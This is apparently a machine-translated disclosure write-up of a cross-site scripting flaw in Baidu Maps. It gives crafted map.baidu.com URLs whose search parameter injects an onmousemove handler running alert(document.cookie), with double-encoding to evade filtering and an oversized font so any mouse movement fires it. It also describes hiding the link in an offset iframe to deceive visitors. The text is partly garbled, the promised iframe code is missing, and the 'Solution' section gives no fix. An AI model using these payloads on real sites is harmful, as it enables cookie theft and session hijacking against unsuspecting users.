Baidu map persistent XSS Vulnerability

Baidu map persistent XSS Vulnerability

<Script> alert (/I am the title party/) </script>

1. Baidu map has a reflection-form XSS vulnerability, but it can become persistent.

2. An XSS connection exists.
 

http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP&c=13382905,3515188&s=bd%26fstq%3D1%26from%3Dwebmap%26c%3D179%26pn%3D0%26rn%3D10%26wd%3D<!XSS!>%26sivtp%3D1%26l%3D12%26bdfrom%3D1

3. The above code starts with the parameter & fstq, and all subsequent parameters with symbols need to be encoded, without encoding. The search is blank, for example, access after decoding,
 

http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP&c=13382905,3515188&s=bd&fstq=1&from=webmap&c=179&pn=0&rn=10&wd=<!XSS!>&sivtp=1&l=12&bdfrom=1

 

4. If the search is empty during the test, this is probably the problem.

Bytes ---------------------------------------------------------------------------------------



5, then. the parameter in XSS is the & wd parameter, because this parameter treats single quotation marks as double quotation marks and is separated as attributes. and the XSS exists in the <a> tag,
 

6. know this and then construct the code.
 

'onmousemove="alert(document.cookie)"style="font-size:999px;cursor: default !important;"

7. Set the font to a greater value in the style attribute.





8. encode the = equals sign twice, because the search content is cleared when the = equals sign exists during this parameter test, so the encoding will not be cleared twice.
 

= → %3d → %253d

Constructed code

http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP&c=13382905,3515188&s=bd%26fstq%3D1%26from%3Dwebmap%26c%3D179%26pn%3D0%26rn%3D10%26wd%3D'onmousemove%253D%22alert(document.cookie)%22style%253d%22font-size:999px;cursor:%20default%20!important;%22%26sivtp%3D1%26l%3D12%26bdfrom%3D1

9.
 

10. XSS is triggered when you move the mouse to the left.







Bytes ------------------------------------------------------------------------------------------



11. At this time, Baidu will say that only Tom can click this connection, and the mouse will move up.





12. In this case, you can use the iframe framework to add concealment.







13. The final constructed code is as follows:


 

<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 






14. the above Code simply says that, in the iframe framework, the reflected XSS connection is added, and the width and height are set to be the same as the size of the XSS range. Then, in order to hide the code in the search bar above, you can set the absolute position to a negative number and move it above to block the search bar so that it will not be seen.





15. Final.


 











16. You can see from the figure above that when the persistent XSS is formed, it can be hashed to your website.
Solution:
Although I don't know why single quotes can be used as double quotes, I feel pretty good.